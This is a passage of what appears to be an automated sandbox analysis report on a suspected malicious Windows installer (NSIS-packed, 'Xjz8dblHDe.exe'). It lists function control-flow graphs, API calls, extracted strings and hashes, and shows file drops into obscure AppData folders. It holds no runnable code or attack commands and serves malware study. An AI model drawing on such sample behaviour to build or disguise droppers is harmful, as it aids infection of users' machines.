                                                                    control_flow_graph 369 402edd-402f2b GetTickCount GetModuleFileNameW call 405d8d 372 402f37-402f65 call 406297 call 405bb8 call 406297 GetFileSize 369->372 373 402f2d-402f32 369->373 381 403052-403060 call 402e79 372->381 382 402f6b 372->382 374 40310f-403113 373->374 388 403062-403065 381->388 389 4030b5-4030ba 381->389 384 402f70-402f87 382->384 386 402f89 384->386 387 402f8b-402f94 call 40330e 384->387 386->387 396 402f9a-402fa1 387->396 397 4030bc-4030c4 call 402e79 387->397 391 403067-40307f call 403324 call 40330e 388->391 392 403089-4030b3 GlobalAlloc call 403324 call 403116 388->392 389->374 391->389 420 403081-403087 391->420 392->389 418 4030c6-4030d7 392->418 398 402fa3-402fb7 call 405d48 396->398 399 40301d-403021 396->399 397->389 407 40302b-403031 398->407 416 402fb9-402fc0 398->416 406 403023-40302a call 402e79 399->406 399->407 406->407 409 403040-40304a 407->409 410 403033-40303d call 406764 407->410 409->384 417 403050 409->417 410->409 416->407 422 402fc2-402fc9 416->422 417->381 423 4030d9 418->423 424 4030df-4030e4 418->424 420->389 420->392 422->407 425 402fcb-402fd2 422->425 423->424 426 4030e5-4030eb 424->426 425->407 427 402fd4-402fdb 425->427 426->426 428 4030ed-403108 SetFilePointer call 405d48 426->428 427->407 429 402fdd-402ffd 427->429 432 40310d 428->432 429->389 431 403003-403007 429->431 433 403009-40300d 431->433 434 40300f-403017 431->434 432->374 433->417 433->434 434->407 435 403019-40301b 434->435 435->407
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 00402EEE
                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Xjz8dblHDe.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                      • Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Xjz8dblHDe.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                      • Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                    • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Xjz8dblHDe.exe,C:\Users\user\Desktop\Xjz8dblHDe.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                    • String ID: v$"C:\Users\user\Desktop\Xjz8dblHDe.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Xjz8dblHDe.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$ll$soft$vy
                                                                    • API String ID: 4283519449-1852429619
                                                                    • Opcode ID: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
                                                                    • Instruction ID: 6efc7070ea8ae83888cd6b0cd51e2fb70848d81e0c864f736895acd6ba0a04dc
                                                                    • Opcode Fuzzy Hash: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
                                                                    • Instruction Fuzzy Hash: 6251C271901208ABDB20AF65DD85BAE7FA8EB05355F10807BF904B62D5DB7C8E408B9D
                                                                    Function 004062B9 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209stringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 436 4062b9-4062c4 437 4062c6-4062d5 436->437 438 4062d7-4062ed 436->438 437->438 439 4062f3-406300 438->439 440 406505-40650b 438->440 439->440 441 406306-40630d 439->441 442 406511-40651c 440->442 443 406312-40631f 440->443 441->440 445 406527-406528 442->445 446 40651e-406522 call 406297 442->446 443->442 444 406325-406331 443->444 447 4064f2 444->447 448 406337-406375 444->448 446->445 452 406500-406503 447->452 453 4064f4-4064fe 447->453 450 406495-406499 448->450 451 40637b-406386 448->451 456 40649b-4064a1 450->456 457 4064cc-4064d0 450->457 454 406388-40638d 451->454 455 40639f 451->455 452->440 453->440 454->455 460 40638f-406392 454->460 463 4063a6-4063ad 455->463 461 4064b1-4064bd call 406297 456->461 462 4064a3-4064af call 4061de 456->462 458 4064d2-4064da call 4062b9 457->458 459 4064df-4064f0 lstrlenW 457->459 458->459 459->440 460->455 466 406394-406397 460->466 472 4064c2-4064c8 461->472 462->472 468 4063b2-4063b4 463->468 469 4063af-4063b1 463->469 466->455 473 406399-40639d 466->473 470 4063b6-4063d4 call 406165 468->470 471 4063ef-4063f2 468->471 469->468 479 4063d9-4063dd 470->479 477 406402-406405 471->477 478 4063f4-406400 GetSystemDirectoryW 471->478 472->459 476 4064ca 472->476 473->463 480 40648d-406493 call 40652b 476->480 482 406470-406472 477->482 483 406407-406415 GetWindowsDirectoryW 477->483 481 406474-406478 478->481 484 4063e3-4063ea call 4062b9 479->484 485 40647d-406480 479->485 480->459 481->480 487 40647a 481->487 482->481 486 406417-406421 482->486 483->482 484->481 485->480 490 406482-406488 lstrcatW 485->490 492 406423-406426 486->492 493 40643b-406451 SHGetSpecialFolderLocation 486->493 487->485 490->480 492->493 497 406428-40642f 492->497 494 406453-40646a SHGetPathFromIDListW CoTaskMemFree 493->494 495 40646c 493->495 494->481 494->495 495->482 498 406437-406439 497->498 498->481 498->493
                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004063FA
                                                                    • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,halituses,?,00405336,halituses,00000000), ref: 0040640D
                                                                    • SHGetSpecialFolderLocation.SHELL32(00405336,?,00000000,halituses,?,00405336,halituses,00000000), ref: 00406449
                                                                    • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00406457
                                                                    • CoTaskMemFree.OLE32(?), ref: 00406462
                                                                    • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406488
                                                                    • lstrlenW.KERNEL32(: Completed,00000000,halituses,?,00405336,halituses,00000000), ref: 004064E0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                    • String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$halituses
                                                                    • API String ID: 717251189-3468386958
                                                                    • Opcode ID: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
                                                                    • Instruction ID: 404aa91c63c37ecb41bc9170075bd2a6d7acde9a16fb3e5716bfaea1f71b207e
                                                                    • Opcode Fuzzy Hash: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
                                                                    • Instruction Fuzzy Hash: C0613671A00511ABDF209F24DD40ABE37A5AF45314F12813FE943BA2D0EB3C99A1CB5D
                                                                    Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 563 40176f-401794 call 402c41 call 405be3 568 401796-40179c call 406297 563->568 569 40179e-4017b0 call 406297 call 405b6c lstrcatW 563->569 574 4017b5-4017b6 call 40652b 568->574 569->574 578 4017bb-4017bf 574->578 579 4017c1-4017cb call 4065da 578->579 580 4017f2-4017f5 578->580 588 4017dd-4017ef 579->588 589 4017cd-4017db CompareFileTime 579->589 582 4017f7-4017f8 call 405d68 580->582 583 4017fd-401819 call 405d8d 580->583 582->583 590 40181b-40181e 583->590 591 40188d-4018b6 call 4052ff call 403116 583->591 588->580 589->588 592 401820-40185e call 406297 * 2 call 4062b9 call 406297 call 4058fd 590->592 593 40186f-401879 call 4052ff 590->593 605 4018b8-4018bc 591->605 606 4018be-4018ca SetFileTime 591->606 592->578 626 401864-401865 592->626 603 401882-401888 593->603 607 402ace 603->607 605->606 609 4018d0-4018db CloseHandle 605->609 606->609 611 402ad0-402ad4 607->611 612 4018e1-4018e4 609->612 613 402ac5-402ac8 609->613 614 4018e6-4018f7 call 4062b9 lstrcatW 612->614 615 4018f9-4018fc call 4062b9 612->615 613->607 621 401901-4022fc call 4058fd 614->621 615->621 621->611 621->613 626->603 627 401867-401868 626->627 627->593
                                                                    APIs
                                                                    • lstrcatW.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186,?,?,00000031), ref: 004017B0
                                                                    • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,00000000,00000000,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186,?,?,00000031), ref: 004017D5
                                                                      • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                      • Part of subcall function 004052FF: lstrlenW.KERNEL32(halituses,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                                                      • Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,halituses,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                                                      • Part of subcall function 004052FF: lstrcatW.KERNEL32(halituses,00403257,00403257,halituses,00000000,?,759223A0), ref: 0040535A
                                                                      • Part of subcall function 004052FF: SetWindowTextW.USER32(halituses,halituses), ref: 0040536C
                                                                      • Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                      • Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                      • Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nslC41E.tmp$C:\Users\user\AppData\Local\Temp\nslC41E.tmp$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186
                                                                    • API String ID: 1941528284-1837947718
                                                                    • Opcode ID: 1aff087000cc3e25554f0ed6ab8061021059107db776a0829eeff450dd20a923
                                                                    • Instruction ID: 2a95d3c8b727dc51f4ea131d05094547f585338353aa12d45a2270be549af1c7
                                                                    • Opcode Fuzzy Hash: 1aff087000cc3e25554f0ed6ab8061021059107db776a0829eeff450dd20a923
                                                                    • Instruction Fuzzy Hash: C141B471910514BACF107BA5DD45DAF3A79EF45328B20823FF512B10E1DB3C4A519B6E
                                                                    Function 004052FF Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 629 4052ff-405314 630 40531a-40532b 629->630 631 4053cb-4053cf 629->631 632 405336-405342 lstrlenW 630->632 633 40532d-405331 call 4062b9 630->633 635 405344-405354 lstrlenW 632->635 636 40535f-405363 632->636 633->632 635->631 637 405356-40535a lstrcatW 635->637 638 405372-405376 636->638 639 405365-40536c SetWindowTextW 636->639 637->636 640 405378-4053ba SendMessageW * 3 638->640 641 4053bc-4053be 638->641 639->638 640->641 641->631 642 4053c0-4053c3 641->642 642->631
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(halituses,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                                                    • lstrlenW.KERNEL32(00403257,halituses,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                                                    • lstrcatW.KERNEL32(halituses,00403257,00403257,halituses,00000000,?,759223A0), ref: 0040535A
                                                                    • SetWindowTextW.USER32(halituses,halituses), ref: 0040536C
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                    • String ID: halituses
                                                                    • API String ID: 2531174081-2845610232
                                                                    • Opcode ID: d3653f13458b7317840ca79dc32cb7632281d068d931c5ba13ed513af890554b
                                                                    • Instruction ID: 8b92f55a8d4b67b8ae829402156b3fb25f72412c241cd3f1eea2d9b1658803e5
                                                                    • Opcode Fuzzy Hash: d3653f13458b7317840ca79dc32cb7632281d068d931c5ba13ed513af890554b
                                                                    • Instruction Fuzzy Hash: 66216071900618BACB11AFA5DD859CFBF78EF85350F10846AF904B62A0C7B94A50CF98
                                                                    Function 00406601 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 643 406601-406621 GetSystemDirectoryW 644 406623 643->644 645 406625-406627 643->645 644->645 646 406638-40663a 645->646 647 406629-406632 645->647 649 40663b-40666e wsprintfW LoadLibraryExW 646->649 647->646 648 406634-406636 647->648 648->649
                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
                                                                    • wsprintfW.USER32 ref: 00406653
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                    • String ID: %s%S.dll$UXTHEME$\
                                                                    • API String ID: 2200240437-1946221925
                                                                    • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                    • Instruction ID: 65f2176863960af248fb2a7cbd18121a9a3b282edca47cb762b3bdaa43f9a997
                                                                    • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                    • Instruction Fuzzy Hash: 14F0217050121967CB10AB68DD0DFDB376CA700304F10447AB547F10D1EBBDDA65CB98
                                                                    Function 00403116 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 650 403116-40312d 651 403136-40313f 650->651 652 40312f 650->652 653 403141 651->653 654 403148-40314d 651->654 652->651 653->654 655 40315d-40316a call 40330e 654->655 656 40314f-403158 call 403324 654->656 660 403170-403174 655->660 661 4032fc 655->661 656->655 662 4032a7-4032a9 660->662 663 40317a-4031a0 GetTickCount 660->663 664 4032fe-4032ff 661->664 668 4032e9-4032ec 662->668 669 4032ab-4032ae 662->669 665 403304 663->665 666 4031a6-4031ae 663->666 667 403307-40330b 664->667 665->667 670 4031b0 666->670 671 4031b3-4031c1 call 40330e 666->671 672 4032f1-4032fa call 40330e 668->672 673 4032ee 668->673 669->665 674 4032b0 669->674 670->671 671->661 683 4031c7-4031d0 671->683 672->661 684 403301 672->684 673->672 675 4032b3-4032b9 674->675 678 4032bb 675->678 679 4032bd-4032cb call 40330e 675->679 678->679 679->661 687 4032cd-4032d9 call 405e3f 679->687 686 4031d6-4031f6 call 4067d2 683->686 684->665 692 4031fc-40320f GetTickCount 686->692 693 40329f-4032a1 686->693 694 4032a3-4032a5 687->694 695 4032db-4032e5 687->695 696 403211-403219 692->696 697 40325a-40325c 692->697 693->664 694->664 695->675 700 4032e7 695->700 701 403221-403252 MulDiv wsprintfW call 4052ff 696->701 702 40321b-40321f 696->702 698 403293-403297 697->698 699 40325e-403262 697->699 698->666 705 40329d 698->705 703 403264-40326b call 405e3f 699->703 704 403279-403284 699->704 700->665 709 403257 701->709 702->697 702->701 710 403270-403272 703->710 708 403287-40328b 704->708 705->665 708->686 711 403291 708->711 709->697 710->694 712 403274-403277 710->712 711->665 712->708
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: CountTick$wsprintf
                                                                    • String ID: ... %d%%
                                                                    • API String ID: 551687249-2449383134
                                                                    • Opcode ID: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
                                                                    • Instruction ID: 204c6f4639eb8c290f7f343d6ac391169eef919077521cdf394e4ce58078bb87
                                                                    • Opcode Fuzzy Hash: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
                                                                    • Instruction Fuzzy Hash: 7A518931900219EBCB10DF65DA84A9F7FA8AB44366F1441BBED14B62C0D7789F50CBA9
                                                                    Function 004057CE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 713 4057ce-405819 CreateDirectoryW 714 40581b-40581d 713->714 715 40581f-40582c GetLastError 713->715 716 405846-405848 714->716 715->716 717 40582e-405842 SetFileSecurityW 715->717 717->714 718 405844 GetLastError 717->718 718->716
                                                                    APIs
                                                                    • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405811
                                                                    • GetLastError.KERNEL32 ref: 00405825
                                                                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040583A
                                                                    • GetLastError.KERNEL32 ref: 00405844
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
